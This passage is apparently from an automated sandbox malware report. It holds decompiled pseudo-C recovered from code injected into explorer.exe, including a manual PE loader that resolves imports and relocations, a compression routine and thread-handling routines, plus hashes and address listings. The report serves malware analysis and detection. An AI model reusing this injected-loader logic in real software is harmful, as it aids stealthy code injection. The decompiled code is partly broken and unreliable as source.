							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                  0x00092d76
                  0x00092d7b
                  0x00092d7f
                  0x00092d82
                  0x00092d82
                  0x00092d85
                  0x00092d8a
                  0x00092d8f
                  0x00092d92
                  0x00092d97
                  0x00092d9a
                  0x00092da0
                  0x00092da0
                  0x00092dab
                  0x00092dae
                  0x00092db5
                  0x00092dba
                  0x00000000
                  0x00000000
                  0x00092dc0
                  0x00092dc5
                  0x00092dc5
                  0x00092dca
                  0x00092dd0
                  0x00092dda
                  0x00092ddf
                  0x00092de5
                  0x00092e04
                  0x00092e07
                  0x00092e12
                  0x00092e12
                  0x00092e12
                  0x00092e09
                  0x00092e09
                  0x00092e0b
                  0x00000000
                  0x00092e0d
                  0x00092e0d
                  0x00092e0d
                  0x00092e0b
                  0x00092e1a
                  0x00092e1f
                  0x00092e24
                  0x00092e2a
                  0x00092e2e
                  0x00092e31
                  0x00092e34
                  0x00092e3a
                  0x00092e3f
                  0x00092e42
                  0x00092e48
                  0x00092e4d
                  0x00092e53
                  0x00092e59
                  0x00092e5e
                  0x00092e61
                  0x00092e66
                  0x00092e6a
                  0x00092e6e
                  0x00092e71
                  0x00092e74
                  0x00092e7d
                  0x00092e84
                  0x00092e87
                  0x00092e8a
                  0x00092e8f
                  0x00092e94
                  0x00092e97
                  0x00092e9a
                  0x00092e9a
                  0x00092e9e
                  0x00092ea7
                  0x00092eae
                  0x00092eb1
                  0x00092eb6
                  0x00092ebb
                  0x00092ebb
                  0x00092ebe
                  0x00092ec3
                  0x00000000
                  0x00000000
                  0x00092de7
                  0x00092de9
                  0x00092df6
                  0x00000000
                  0x00000000
                  0x00092df6
                  0x00092de9
                  0x00000000
                  0x00092de5
                  0x00092ec9
                  0x00092ece
                  0x00092ed1
                  0x00092ed4
                  0x00092f7f
                  0x00092f7f
                  0x00092eda
                  0x00092eda
                  0x00092eda
                  0x00092edf
                  0x00092f09
                  0x00092f0c
                  0x00092f0c
                  0x00092f11
                  0x00092f13
                  0x00092f15
                  0x00092f18
                  0x00092f1b
                  0x00092f23
                  0x00092f28
                  0x00092f28
                  0x00092f2e
                  0x00092f31
                  0x00092f34
                  0x00092f37
                  0x00092f39
                  0x00092f39
                  0x00092f3a
                  0x00092f3a
                  0x00092f37
                  0x00092f48
                  0x00092f4b
                  0x00092f4f
                  0x00092f54
                  0x00092f57
                  0x00092f5a
                  0x00092f5a
                  0x00092f5a
                  0x00092f5d
                  0x00092f5d
                  0x00092f60
                  0x00092f60
                  0x00092ee1
                  0x00092ee1
                  0x00092ef1
                  0x00092ef4
                  0x00092ef9
                  0x00092ef9
                  0x00092efc
                  0x00092eff
                  0x00092f02
                  0x00092f04
                  0x00092f04
                  0x00092f63
                  0x00092f65
                  0x00092f68
                  0x00092f68
                  0x00092f6e
                  0x00092f72
                  0x00092f75
                  0x00092f77
                  0x00092f77
                  0x00092f88
                  0x00092f8a
                  0x00092f8a
                  0x00092f92
                  0x00092fa0
                  0x00092fa3
                  0x00092fa5
                  0x00092fc5
                  0x00092fc5
                  0x00092fc8
                  0x00092fce
                  0x00092fcf
                  0x00092fd2
                  0x00092fd4
                  0x00092fd7
                  0x00092fda
                  0x00092fdd
                  0x00092fe1
                  0x00092fe4
                  0x00092fe7
                  0x00092fea
                  0x00092fec
                  0x00092fec
                  0x00092fef
                  0x00092ff1
                  0x00092ff1
                  0x00092ff4
                  0x00092ff6
                  0x00092ff9
                  0x00093001
                  0x00093004
                  0x00093009
                  0x00093009
                  0x0009300f
                  0x00093012
                  0x00093015
                  0x00093017
                  0x00093017
                  0x00093018
                  0x00093018
                  0x00093023
                  0x00093023
                  0x00093023
                  0x00093026
                  0x00093029
                  0x00093029
                  0x0009302c
                  0x0009302c
                  0x00092fef
                  0x0009302f
                  0x00093032
                  0x00093035
                  0x00093037
                  0x0009303a
                  0x0009303c
                  0x0009303f
                  0x00093042
                  0x00093044
                  0x00093047
                  0x0009304f
                  0x00093057
                  0x0009305a
                  0x0009305a
                  0x0009305a
                  0x0009305d
                  0x0009305d
                  0x0009305d
                  0x00093060
                  0x00093066
                  0x00093068
                  0x00093068
                  0x0009306e
                  0x00093074
                  0x0009307d
                  0x00093084
                  0x00093086
                  0x00093089
                  0x00093089
                  0x0009308c
                  0x0009308c
                  0x0009308f
                  0x00093091
                  0x00093094
                  0x00093096
                  0x000930b1
                  0x000930b1
                  0x000930b5
                  0x000930b8
                  0x000930bb
                  0x000930be
                  0x000930d4
                  0x000930d4
                  0x000930d4
                  0x000930c0
                  0x000930c0
                  0x000930c2
                  0x000930c6
                  0x000930c9
                  0x00000000
                  0x000930cb
                  0x000930cb
                  0x000930cd
                  0x00000000
                  0x000930cf
                  0x000930cf
                  0x000930cf
                  0x000930cd
                  0x000930c9
                  0x000930d8
                  0x000930db
                  0x000930e0
                  0x000930ea
                  0x000930ea
                  0x000930ea
                  0x000930ed
                  0x00093098
                  0x00093098
                  0x0009309a
                  0x000930a1
                  0x000930a1
                  0x000930a3
                  0x000930a5
                  0x000930a7
                  0x000930ab
                  0x000930ad
                  0x000930af
                  0x00000000
                  0x00000000
                  0x000930af
                  0x000930ab
                  0x0009309c
                  0x0009309c
                  0x0009309f
                  0x00000000
                  0x00000000
                  0x0009309f
                  0x0009309a
                  0x000930f7
                  0x000930f9
                  0x000930f9
                  0x00093104
                  0x00092fa7
                  0x00092fa7
                  0x00092faa
                  0x00000000
                  0x00092fac
                  0x00092fac
                  0x00092fae
                  0x00092fb2
                  0x00000000
                  0x00092fb4
                  0x00092fb4
                  0x00092fb4
                  0x00092fb7
                  0x00000000
                  0x00092fbb
                  0x00092fc4
                  0x00092fc4
                  0x00092fb7
                  0x00092fb2
                  0x00092faa
                  0x00092f96
                  0x00092f9f
                  0x00092f9f

                  APIs
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 52%
                  			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                  0x00092afb
                  0x00092b01
                  0x00092b0a
                  0x00092b0d
                  0x00092b10
                  0x00000000
                  0x00092c01
                  0x00092c05
                  0x00092c07
                  0x00092c15
                  0x00092d33
                  0x00092d3c
                  0x00092d3f
                  0x00092d43
                  0x00092d49
                  0x00092d51
                  0x00092d51
                  0x00092d59
                  0x00000000
                  0x00092d64
                  0x00092c1b
                  0x00092c24
                  0x00092c32
                  0x00092c35
                  0x00092c52
                  0x00092c59
                  0x00092c6b
                  0x00092c6b
                  0x00092c72
                  0x00092c82
                  0x00092c9a
                  0x00092c84
                  0x00092c8c
                  0x00092c8c
                  0x00092c9d
                  0x00092ca1
                  0x00092cb1
                  0x00092cd4
                  0x00092ce6
                  0x00092cb3
                  0x00092cc7
                  0x00092cc7
                  0x00092cf0
                  0x00092d0c
                  0x00092cf2
                  0x00092d01
                  0x00092d01
                  0x00092d14
                  0x00092d1d
                  0x00092d1d
                  0x00092d2b
                  0x00000000
                  0x00092c74
                  0x00092c76
                  0x00000000
                  0x00092c76
                  0x00092c72
                  0x00000000
                  0x00092c35
                  0x00092b18
                  0x00092b26
                  0x00092b2b
                  0x00092b36
                  0x00092b39
                  0x00092b3d
                  0x00092b3f
                  0x00092b4f
                  0x00092b58
                  0x00092b61
                  0x00092b69
                  0x00092b72
                  0x00092b7d
                  0x00092b83
                  0x00092b86
                  0x00092b89
                  0x00092b90
                  0x00092b97
                  0x00000000
                  0x00000000
                  0x00092ba2
                  0x00092bb0
                  0x00092bbb
                  0x00092bc5
                  0x00092bdd
                  0x00092bea
                  0x00092bea
                  0x00092bc7
                  0x00092bd2
                  0x00092bd2
                  0x00092bf1
                  0x00092bf1
                  0x00092bf9
                  0x00092bf9
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                  • LoadLibraryA.KERNEL32(?), ref: 00092C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                  • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1d4
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0xe7f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0xe7f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1d4
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0xe7ffa8
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1d4
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                  0x00081c68
                  0x00081c75
                  0x00081c77
                  0x00081c7e
                  0x00081ce4
                  0x00081c8b
                  0x00081c90
                  0x00081c96
                  0x00081c9b
                  0x00081ca1
                  0x00081ca3
                  0x00081ca7
                  0x00081d15
                  0x00081d17
                  0x00081d99
                  0x00081d9f
                  0x00081d9f
                  0x00081ca9
                  0x00081cb1
                  0x00081cb1
                  0x00081cbd
                  0x00081cc3
                  0x00081cc5
                  0x00000000
                  0x00000000
                  0x00081cc7
                  0x00081cd1
                  0x00081cd7
                  0x00081cdd
                  0x00081cdf
                  0x00000000
                  0x00081cdf
                  0x00081cab
                  0x00081caf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00081caf
                  0x00081cee
                  0x00081cef
                  0x00081cf0
                  0x00081cf1
                  0x00081cf2
                  0x00081cf7
                  0x00081d01
                  0x00081d06
                  0x00081d0e
                  0x00081d29
                  0x00081d2c
                  0x00081d36
                  0x00081d41
                  0x00081d54
                  0x00081d56
                  0x00081d58
                  0x00081d5a
                  0x00081d5b
                  0x00081d63
                  0x00081d64
                  0x00081d6a
                  0x00081d10
                  0x00081d10
                  0x00081d10
                  0x00081d6b
                  0x00081d76
                  0x00081d79
                  0x00081d7f
                  0x00081d85
                  0x00081d90
                  0x00081d97
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cb3f63950b04c1ad73a20e986723358a012182b6e37857227db130d42d621313
                  • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                  • Opcode Fuzzy Hash: cb3f63950b04c1ad73a20e986723358a012182b6e37857227db130d42d621313
                  • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1d0
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0xe7f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0xe7f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1d0
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0xe7ffa8
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1d0
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























                  0x00081b2d
                  0x00081b33
                  0x00081b41
                  0x00081baf
                  0x00081b4e
                  0x00081b53
                  0x00081b59
                  0x00081b5e
                  0x00081b64
                  0x00081b66
                  0x00081b6a
                  0x00081c64
                  0x00081c64
                  0x00081b70
                  0x00081b70
                  0x00081b7c
                  0x00081b7c
                  0x00081b88
                  0x00081b8e
                  0x00081b90
                  0x00000000
                  0x00081b92
                  0x00081b92
                  0x00081b9c
                  0x00081ba2
                  0x00081ba8
                  0x00081baa
                  0x00000000
                  0x00081baa
                  0x00081b72
                  0x00081b72
                  0x00081b76
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00081b76
                  0x00081b70
                  0x00081c5d
                  0x00081c63
                  0x00081c63
                  0x00081bb8
                  0x00081bcc
                  0x00081bcf
                  0x00081bd9
                  0x00081be5
                  0x00081bef
                  0x00081bf0
                  0x00081bf1
                  0x00081bf2
                  0x00081bf7
                  0x00081c00
                  0x00081c04
                  0x00081c06
                  0x00081c07
                  0x00081c0f
                  0x00081c10
                  0x00081c16
                  0x00081c1b
                  0x00081c21
